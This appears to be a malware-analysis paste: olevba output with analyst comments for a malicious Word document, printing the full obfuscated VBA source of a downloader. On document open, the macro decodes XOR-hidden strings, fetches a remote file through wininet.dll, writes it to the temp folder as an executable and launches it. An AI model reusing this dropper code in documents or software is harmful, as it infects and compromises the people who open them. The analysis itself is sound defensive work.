dynamoo

Malicious Word macro

Apr 21st, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- I413136.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: I413136.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: I413136.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub RAMIRO(FELIX As Long)
      ' Analyst note: pass-through hop in the call chain. FELIX is never read;
      ' the only action is the call to CONRAD (defined in module AMOS).
  17. CONRAD
  18. End Sub
  19.  
  20. Sub autoopen()
      ' Analyst note: auto-executable entry point (olevba flags it as AutoExec:
      ' "Runs when the Word document is opened"). Everything else in this
      ' document is reached from here: autoopen -> RAMIRO -> CONRAD -> DOMINGO
      ' -> AUBREY -> ELIAS -> ORVILLE. The literal 124 is ignored by RAMIRO.
  21. RAMIRO (124)
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO PERCY.bas
  32. in file: I413136.doc - OLE stream: u'Macros/VBA/PERCY'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35. Public Function RICARDO(ByRef OLIVER As Object, ByRef HUGO As String, RUBEN As Double) As Boolean
      ' Analyst note: execution step. Creates a COM object whose ProgID is the
      ' result of SHELDON(WINSTON, TOMMIE), i.e. constant TOMMIE XOR-decoded with
      ' key WINSTON (decoded by hand from the constants on this page this is
      ' "Shell.Application" - verify), then calls its Open method on OLIVER & HUGO.
      ' ORVILLE passes the temp-folder object and the decoded file name, so this
      ' opens the file that HUMBERTO wrote. RUBEN is unused and the function
      ' name is never assigned, so the return value is always the default False.
  36.  
  37. Set TOMAS = CreateObject _
  38. (SHELDON _
  39. (WINSTON, TOMMIE))
  40. Dim BRETT As Integer
  41. BRETT = TOMAS.Open(OLIVER & HUGO)
  42. End Function
  43.  
  44. Public Function GILBERTO(ByRef ERICK As String, ByRef TRENT As Long) As Integer
      ' Analyst note: key-byte selector for the XOR decoder. Returns the character
      ' code of the key ERICK at position (TRENT Mod Len(ERICK)) + 1, so the key
      ' repeats cyclically. WOODROW is a Mid$ wrapper; its first argument (44)
      ' has no effect on the result.
  45. GILBERTO = Asc(WOODROW(44, ERICK, _
  46.         ((TRENT Mod SALVATORE(ERICK)) + 1), 1))
  47. End Function
  48.  
  49. Public Function LIONEL(FREDDIE As Long, TERRENCE As String, ENRIQUE As String) As String
      ' Analyst note: thin wrapper around the decoder: returns
      ' SHELDON(TERRENCE, ENRIQUE) (key, hex ciphertext). The doubling of FREDDIE
      ' is junk code; its value does not influence the result.
  50. FREDDIE = FREDDIE * 2
  51. LIONEL = SHELDON(TERRENCE, ENRIQUE)
  52.    
  53. End Function
  54.  
  55. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  56. ANALYSIS:
  57. +------------+--------------+--------------------------+
  58. | Type       | Keyword      | Description              |
  59. +------------+--------------+--------------------------+
  60. | Suspicious | CreateObject | May create an OLE object |
  61. | Suspicious | Open         | May open a file          |
  62. +------------+--------------+--------------------------+
  63. -------------------------------------------------------------------------------
  64. VBA MACRO CLAY.bas
  65. in file: I413136.doc - OLE stream: u'Macros/VBA/CLAY'
  66. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  67.  
  68.  
  69.  
  70. Public Function SHELDON(ERICK As String, REYNALDO As String) As String
      ' Analyst note: string de-obfuscation routine (repeating-key XOR over a
      ' hex-encoded string). ERICK is the key, REYNALDO the hex ciphertext.
      ' For each byte index TRENT = 1 .. Len(REYNALDO) / 2:
      '   JERALD = value of the TRENT-th hex pair of REYNALDO   (DEWAYNE)
      '   EDMOND = key byte at (TRENT Mod Len(ERICK)) + 1       (GILBERTO)
      '   output = output + Chr(JERALD Xor EDMOND)              (EMANUEL)
      ' The DARREL loop (77 To 78, testing for 70) can never hit its End
      ' statement; it is filler. This routine is why olevba reports Hex strings,
      ' Chr and Xor but no plaintext URL or file-name IOCs for this sample.
  71.    
  72.     Dim JERALD As Integer
  73.     Dim EDMOND As Integer
  74.    
  75.    
  76.     Dim DARREL As Integer
  77. For DARREL = 77 To 78
  78. If DARREL = 70 Then End
  79. Next DARREL
  80.    
  81.     Dim TRENT As Long
  82.     Dim TERENCE As String
  83.     For TRENT = 1 _
  84.     To _
  85.     ( _
  86.     SALVATORE _
  87.     (REYNALDO) _
  88.     / 2)
  89.         JERALD = DEWAYNE(REYNALDO, TRENT)
  90.         EDMOND = GILBERTO(ERICK, TRENT)
  91.         TERENCE = TERENCE + EMANUEL(JERALD, EDMOND)
  92.     Next TRENT
  93.    SHELDON = TERENCE
  94. End Function
  95.  
  96. Public Function AUBREY(SANTIAGO As String)
       ' Analyst note: another hop in the call chain. SANTIAGO is never read; the
       ' only meaningful action is the call to ELIAS. The ALONZO arithmetic is
       ' filler and the function returns nothing.
  97. Dim ALONZO As Long
  98. ALONZO = 1
  99. ELIAS ALONZO * 2
  100. ALONZO = ALONZO + 4
  101. End Function
  102.  
  103.  
  104.  
  105.  
  106.  
  107.  
  108. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  109. ANALYSIS:
  110. No suspicious keyword or IOC found.
  111. -------------------------------------------------------------------------------
  112. VBA MACRO ROLANDO.bas
  113. in file: I413136.doc - OLE stream: u'Macros/VBA/ROLANDO'
  114. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  115.  
  116. Public Function SALVATORE(KRISTOPHER As String) As Long
       ' Analyst note: renamed wrapper around Len(); used by the decoder and by
       ' HUMBERTO so that the built-in name does not appear at the call sites.
  117. SALVATORE = Len(KRISTOPHER)
  118. End Function
  119.  
  120.  
  121. Public Function ELIAS(ERNESTO As Double)
       ' Analyst note: sets up the objects for the payload stage. The two ROMAN
       ' loops, the ROMAN/ERNESTO arithmetic and the End guard are filler.
       ' Meaningful statements:
       '   Set ELLIS = LAURENCE          - object created by LAURENCE (module CORNELIUS)
       '   LEWIS = ORVILLE(LIONEL, ELLIS) - hands that object to ORVILLE (module AMOS)
       ' LIONEL here is a local, unset Object variable (it shadows the function of
       ' the same name); ORVILLE assigns it via its ByRef parameter.
  122.  
  123. Dim LIONEL As Object
  124.  
  125.  
  126.     Dim ROMAN As Long
  127. For ROMAN = 14 To 15
  128. ROMAN = ROMAN + 15
  129. Next ROMAN
  130.    
  131.  
  132. Dim ELLIS  As Object
  133.  
  134.  
  135. For ROMAN = 10 To 20
  136. ROMAN = ROMAN + 60
  137. Next ROMAN
  138.    
  139.  
  140. Set ELLIS = LAURENCE
  141. ROMAN = ROMAN + 5
  142. Dim LEWIS As Boolean
  143.  
  144. If ROMAN > ROMAN * 100 Then End
  145. LEWIS = ORVILLE(LIONEL, ELLIS)
  146. ERNESTO = ERNESTO + 4
  147. End Function
  148.  
  149.  
  150. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  151. ANALYSIS:
  152. No suspicious keyword or IOC found.
  153. -------------------------------------------------------------------------------
  154. VBA MACRO CORNELIUS.bas
  155. in file: I413136.doc - OLE stream: u'Macros/VBA/CORNELIUS'
  156. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  157.  
  158. Option Explicit
  159.  
  160. Sub DOMINGO(SANTOS As Double)
       ' Analyst note: call-chain hop. SANTOS is unused and the "ROYCE" argument
       ' is ignored by AUBREY; the only effect is reaching AUBREY -> ELIAS.
  161.  
  162. AUBREY ("ROYCE")
  163. End Sub
  164.  
  165. Public Function EMANUEL(ByRef JERALD As Integer, ByRef EDMOND As Integer) As String
       ' Analyst note: core of the decoder: XORs one ciphertext byte (JERALD)
       ' with one key byte (EDMOND) and returns the resulting character.
  166.     EMANUEL = Chr(JERALD Xor EDMOND)
  167. End Function
  168.  
  169. Public Function DEWAYNE(ByRef REYNALDO As String, ByRef TRENT As Long) As Integer
       ' Analyst note: hex-pair reader for the decoder. Takes two characters of
       ' REYNALDO starting at MORGAN(TRENT) = 2 * TRENT - 1 and converts them from
       ' hexadecimal with Val("&H" & ...). The 12 passed to WOODROW is unused.
  170.  DEWAYNE = Val("&H" & (WOODROW(12, REYNALDO, MORGAN(TRENT), 2)))
  171. End Function
  172. Public Function MORGAN(ByRef TRENT As Long) As Long
       ' Analyst note: maps the 1-based byte index TRENT to the 1-based character
       ' offset of its hex pair (1 -> 1, 2 -> 3, 3 -> 5, ...).
  173.  MORGAN = (2 * TRENT) - 1
  174. End Function
  175.  
  176. Public Function LAURENCE() As Object
       ' Analyst note: creates a COM object whose ProgID is constant DARRIN
       ' XOR-decoded with key WINSTON. Decoded by hand from the constants on this
       ' page the ProgID is "Scripting.FileSystemObject" (verify); this is
       ' consistent with the FileExists and GetSpecialFolder calls made on the
       ' returned object in module AMOS.
  177. Dim ISMAEL As String
  178. ISMAEL = SHELDON(WINSTON, DARRIN)
  179. Set LAURENCE = CreateObject(ISMAEL)
  180. End Function
  181.  
  182.  
  183.  
  184.  
  185. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  186. ANALYSIS:
  187. +------------+--------------+-----------------------------------------+
  188. | Type       | Keyword      | Description                             |
  189. +------------+--------------+-----------------------------------------+
  190. | Suspicious | CreateObject | May create an OLE object                |
  191. | Suspicious | Chr          | May attempt to obfuscate specific       |
  192. |            |              | strings                                 |
  193. | Suspicious | Xor          | May attempt to obfuscate specific       |
  194. |            |              | strings                                 |
  195. +------------+--------------+-----------------------------------------+
  196. -------------------------------------------------------------------------------
  197. VBA MACRO LAMAR.bas
  198. in file: I413136.doc - OLE stream: u'Macros/VBA/LAMAR'
  199. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  200.  
  201.  
  202. Public Const SLIONEL = "JOHN"
       ' Analyst note: SLIONEL is not referenced anywhere in the modules shown.
  203.  
  204. #If VBA7 And Win64 Then
       ' Analyst note: WinINet imports under innocuous aliases. Both branches
       ' declare the same four functions; the first uses PtrSafe/LongPtr for
       ' 64-bit Office, the #Else branch uses Long for 32-bit Office.
       '   WILSON    = InternetCloseHandle
       '   GUSTAVO   = InternetOpenA
       '   SYLVESTER = InternetReadFile
       '   ROOSEVELT = InternetOpenUrlA
       ' The first-branch declarations are split across continuation lines, which
       ' defeats naive single-line pattern matching on "Declare ... Lib".
       ' Detection-wise this means the HTTP request originates from the Word
       ' process itself through wininet.dll, not from a child process.
  205. Public _
  206. Declare _
  207. PtrSafe _
  208. Function _
  209. WILSON Lib _
  210. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
  211. Public _
  212. Declare _
  213. PtrSafe _
  214. Function _
  215. GUSTAVO Lib _
  216. "wininet.dll" Alias "InternetOpenA" (ByVal GARLAND As String, ByVal STEPHANPH As Long, ByVal THOMAS As String, ByVal DEWAYNETOPHER As String, ByVal DANIEL As Long) As LongPtr
  217. Public _
  218. Declare _
  219. PtrSafe _
  220. Function _
  221. SYLVESTER Lib _
  222. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  223. Public _
  224. Declare _
  225. PtrSafe _
  226. Function _
  227. ROOSEVELT Lib _
  228. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
  229. #Else
  230. Public Declare Function WILSON Lib "wininet.dll" _
  231. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
  232. Public Declare Function GUSTAVO Lib "wininet.dll" _
  233. Alias "InternetOpenA" (ByVal GARLAND As String, ByVal STEPHANPH As Long, ByVal THOMAS As String, ByVal DEWAYNETOPHER As String, ByVal DANIEL As Long) As Long
  234. Public Declare Function SYLVESTER Lib "wininet.dll" _
  235. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  236. Public Declare Function ROOSEVELT Lib "wininet.dll" _
  237. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
  238. #End If
  239.  
  240.  
  241. Public Function WOODROW(SAMMY As Long, ByRef KRISTOPHER As String, ByRef JERALD As Integer, ByRef EDMOND As Integer) As String
       ' Analyst note: renamed wrapper around Mid$(string, start, length). SAMMY
       ' is a decoy parameter: it is incremented but never used in the result.
  242.     WOODROW = Mid$(KRISTOPHER, JERALD, EDMOND)
  243.     SAMMY = SAMMY + 31
  244. End Function
  245. #If VBA7 _
  246.     And Win64 Then
  247. Public Function EFRAIN() As LongPtr
  248.  #Else
  249. Public Function EFRAIN() As Long
  250.  
  251.  #End If
       ' Analyst note: opens the WinINet session. GUSTAVO is the alias for
       ' InternetOpenA; its first parameter is the user-agent string and its
       ' second the access type. STACYK and EMILIO are not defined in this module;
       ' module DEXTER declares Private constants with these names ("COURTNEY"
       ' and 1), which would not be visible from here, so check what values
       ' these names resolve to in this module before relying on a
       ' user-agent indicator.
  252.  
  253.  EFRAIN = GUSTAVO(STACYK, EMILIO, vbNullString, vbNullString, 0)
  254. End Function
  255.  
  256.  
  257.  
  258.  
  259.  
  260.  
  261. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  262. ANALYSIS:
  263. +------------+----------------+-----------------------------------------+
  264. | Type       | Keyword        | Description                             |
  265. +------------+----------------+-----------------------------------------+
  266. | Suspicious | Lib            | May run code from a DLL                 |
  267. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  268. |            |                | may be used to obfuscate strings        |
  269. |            |                | (option --decode to see all)            |
  270. | IOC        | wininet.dll    | Executable file name                    |
  271. +------------+----------------+-----------------------------------------+
  272. -------------------------------------------------------------------------------
  273. VBA MACRO DEXTER.bas
  274. in file: I413136.doc - OLE stream: u'Macros/VBA/DEXTER'
  275. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  276. Option Explicit
  277. Private Const BRENDAN = 6000
       ' BRENDAN: size of the fixed-length read buffer used by HUMBERTO.
  278. Private Const STACYK As String = "COURTNEY"
       ' STACYK: same name as the first argument EFRAIN passes to InternetOpenA.
  279. Private Const EMILIO = 1
       ' EMILIO: same name as the access-type argument EFRAIN passes to InternetOpenA.
  280. Private Const ELIJAH = &H4000000
       ' ELIJAH: flags value BILLIE passes to InternetOpenUrlA
       ' (0x04000000 corresponds to INTERNET_FLAG_NO_CACHE_WRITE).
  281.  
  282.  
  283. Public Function HUMBERTO(EMMANUEL As Long, ByVal STEPHAN As String) As Boolean
       ' Analyst note: download-and-write stage. STEPHAN is the destination path
       ' (ORVILLE passes temp folder & decoded file name); EMMANUEL is unused.
       ' Flow:
       '   1. LOUIE    = EFRAIN                      - InternetOpenA session handle
       '   2. STERLING = handle set by BILLIE        - InternetOpenUrlA on the decoded URL
       '   3. SYLVESTER (InternetReadFile) reads BRENDAN-byte chunks into STACY and
       '      the data is accumulated in GARLAND until a read returns 0 bytes
       '   4. GARLAND is written to STEPHAN with Open ... For Binary Access Write / Put
       '   5. both handles are closed through WILSON (InternetCloseHandle)
       ' Returns True when the accumulated length MICAH is non-zero.
       ' The LOGAN arithmetic and its End guards are filler.
       ' Defender view: the observable behaviour is a Word process fetching a URL
       ' through WinINet and creating a new binary file under the temp folder.
  284.     #If VBA7 And Win64 Then
  285.         Dim LOUIE As LongPtr, STERLING As LongPtr
  286.     #Else
  287.         Dim LOUIE As Long, STERLING As Long
  288.     #End If
  289.     Dim LAMONT As Long
  290.     Dim STACY As String * BRENDAN, GARLAND As String
  291.     Dim MILES As Integer, MICAH As Double
  292.     LOUIE = EFRAIN
  293.     If LOUIE = 0 Then
  294.         Exit Function
  295.     End If
  296.     Dim LUCAS As Boolean
  297.    
  298.     If BILLIE(STERLING, LOUIE) Then
  299.     End If
  300.     If STERLING = 0 Then
  301.         MICAH = 0
  302.     Else
         ' First read: the whole fixed-length buffer is copied into GARLAND,
         ' regardless of the byte count returned in LAMONT.
  303.         SYLVESTER STERLING, STACY, BRENDAN, LAMONT
  304.         GARLAND = STACY
  305.           Dim LOGAN As Integer
  306.           LOGAN = 0
  307.           LOGAN = LOGAN + 33
  308. If LOGAN > LOGAN + 40 Then End
  309.         Do While LAMONT <> 0
  310.             SYLVESTER STERLING, STACY, BRENDAN, LAMONT
  311.                     GARLAND = GARLAND + Mid(STACY, 1, LAMONT)
  312.         Loop
  313.              MICAH = SALVATORE(GARLAND): _
  314.              MILES = LOWELL("JERRY")
         ' File write: MILES is a free file number from FreeFile (via LOWELL).
  315.         Open STEPHAN _
  316.             For Binary Access Write _
  317.         Lock Write _
  318.         As #MILES
  319.         Put #MILES, _
  320.                 , GARLAND
  321.         LOGAN = LOGAN + 62
  322.     If LOGAN < 0 Then End
  323.         Close #MILES
  324.     End If
  325.     WILSON STERLING
  326.     WILSON LOUIE
  327.     GARLAND = ""
  328.     If MICAH Then
  329.         HUMBERTO = True
  330.     End If
  331. End Function
  332.  
  333.  
  334. #If VBA7 And Win64 Then
  335.        Public Function BILLIE(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
  336.     #Else
  337.        Public Function BILLIE(ByRef GRADY As Long, NOAH As Long) As Boolean
  338.     #End If
       ' Analyst note: opens the remote resource. GUADALUPE is constant TIMMY
       ' XOR-decoded with key WINSTON (through LIONEL -> SHELDON); it is passed as
       ' the URL argument of ROOSEVELT (InternetOpenUrlA) together with the session
       ' handle NOAH and the flags constant ELIJAH. The resulting handle is
       ' returned through the ByRef parameter GRADY. The function always returns
       ' True, so callers must test GRADY, not the return value. The 893 argument
       ' and the PHIL loop are filler.
       ' The decoded value of TIMMY is the network indicator for this sample;
       ' recover it offline with the XOR routine rather than by running the macro.
  339.         Dim PHIL As Double
  340. Dim GUADALUPE As String
  341. Dim CLARK As Long
  342.     GUADALUPE = LIONEL(893, WINSTON, TIMMY)
  343.  
  344. For PHIL = 14 To 15
  345. PHIL = PHIL + 5.5
  346. Next PHIL
  347.     GRADY = ROOSEVELT(NOAH, GUADALUPE, vbNullString, 0, ELIJAH, 0)
  348.     BILLIE = True
  349. End Function
  350.  
  351.  
  352. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  353. ANALYSIS:
  354. +------------+----------------+-----------------------------------------+
  355. | Type       | Keyword        | Description                             |
  356. +------------+----------------+-----------------------------------------+
  357. | Suspicious | Open           | May open a file                         |
  358. | Suspicious | Write          | May write to a file (if combined with   |
  359. |            |                | Open)                                   |
  360. | Suspicious | Put            | May write to a file (if combined with   |
  361. |            |                | Open)                                   |
  362. | Suspicious | Binary         | May read or write a binary file (if     |
  363. |            |                | combined with Open)                     |
  364. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  365. |            |                | may be used to obfuscate strings        |
  366. |            |                | (option --decode to see all)            |
  367. +------------+----------------+-----------------------------------------+
  368. -------------------------------------------------------------------------------
  369. VBA MACRO AMOS.bas
  370. in file: I413136.doc - OLE stream: u'Macros/VBA/AMOS'
  371. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  372. Public Const TOMMIE = "123A2E29226A003C3C253C3029353B242B"
       ' TOMMIE: hex ciphertext; decoded in RICARDO and used as a CreateObject ProgID
       ' (by hand: "Shell.Application" - verify).
  373. Public Const RANDAL = "1D2222203C36247A622C2D36"
       ' RANDAL: hex ciphertext; decoded in ORVILLE and appended to the temp folder
       ' path as the dropped file name (by hand: "\pierre6.exe" - verify).
  374. Public Const TIMMY = "29263F35746B6E29382C273D21352B262A2C2D2D293F67363C256E607E6A7F707562293130"
       ' TIMMY: hex ciphertext; decoded in BILLIE and passed to InternetOpenUrlA as
       ' the URL to fetch.
  375. Public Const DARRIN = "1231392C3E3028222B67133A24240132363A212C032E2330303C"
       ' DARRIN: hex ciphertext; decoded in LAURENCE and used as a CreateObject ProgID
       ' (by hand: "Scripting.FileSystemObject" - verify).
  376. Public Const WINSTON = "HARKENDALLIUS"
       ' WINSTON: the repeating XOR key used for all four strings above. Note the
       ' decoder starts at the second key character for the first byte
       ' ((TRENT Mod Len(key)) + 1 with TRENT starting at 1).
  377.  
  378.  
  379. Public Sub CONRAD()
       ' Analyst note: call-chain hop reached from RAMIRO. The ELBERT loop and the
       ' unused BERT variable are filler; the only effect is the call to DOMINGO.
  380.         Dim BERT As Long
  381.  
  382.     Dim ELBERT As Long
  383. For ELBERT = 5 To 11
  384. ELBERT = ELBERT * 3
  385. Next ELBERT
  386.  
  387. DOMINGO (8.2)
  388.  
  389. End Sub
  390.  
  391.  
  392. Public Function ORVILLE(ByRef OLIVER As Object, ByRef HOMER As Object) As Boolean
       ' Analyst note: orchestrates the payload stage (called from ELIAS with
       ' HOMER = the object returned by LAURENCE).
       '   1. OLIVER = IGNACIO(LAURENCE)  - GetSpecialFolder(2) on a new LAURENCE object
       '   2. HUGO   = decoded RANDAL     - file name
       '   3. JODY   = OLIVER & HUGO      - full destination path
       '   4. HUMBERTO(589, JODY)         - download and write the file to JODY
       '   5. RICARDO(OLIVER, HUGO, 9)    - open (launch) the written file
       ' The WILFRED (FileExists) checks before and after the download have empty
       ' bodies: their results are discarded, so a failed download is not
       ' detected and RICARDO is attempted regardless. The DREW loop and the 2048,
       ' 589 and 9 literals are filler.
  393.  
  394. Dim DREW As Long
  395. Set OLIVER = IGNACIO(LAURENCE)
  396.  
  397. Dim JODY
  398.  
  399. Dim HUGO As String
  400. HUGO = LIONEL(2048, WINSTON, RANDAL)
  401.  
  402. For DREW = 144 To 145
  403. DREW = DREW * 3
  404. Next DREW
  405. JODY = OLIVER & HUGO
  406.  
  407.  
  408. If WILFRED(HOMER, JODY) Then
  409.  
  410. End If
  411. If HUMBERTO(589, JODY) Then
  412. End If
  413. If WILFRED(HOMER, JODY) Then
  414. End If
  415.  
  416.  
  417. ORVILLE = RICARDO(OLIVER, HUGO, 9)
  418.  
  419. End Function
  420. Public Function WILFRED(ByRef JERMAINE As Object, ByVal FORREST As String) As Boolean
       ' Analyst note: wrapper that returns JERMAINE.FileExists(FORREST) as a
       ' Boolean. JERMAINE is the object created by LAURENCE.
  421. If JERMAINE.FileExists(FORREST) Then
  422. WILFRED = True
  423. Else
  424. WILFRED = False
  425. End If
  426. End Function
  427.  
  428. Public Function LOWELL(KRISTOPHER As String) As Integer
       ' Analyst note: renamed wrapper around FreeFile (next unused file number).
       ' The KRISTOPHER argument is ignored.
  429.     LOWELL = FreeFile
  430. End Function
  431.  
  432. Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
       ' Analyst note: returns NICHOLAS.GetSpecialFolder(2). On a
       ' Scripting.FileSystemObject the value 2 selects the temporary folder, so
       ' this is where the downloaded file is written - presumably %TEMP% of the
       ' user who opened the document; confirm on the analysed host.
  433. Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
  434. End Function
  435.  
  436. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  437. ANALYSIS:
  438. +------------+-------------+-----------------------------------------+
  439. | Type       | Keyword     | Description                             |
  440. +------------+-------------+-----------------------------------------+
  441. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  442. |            |             | be used to obfuscate strings (option    |
  443. |            |             | --decode to see all)                    |
  444. +------------+-------------+-----------------------------------------+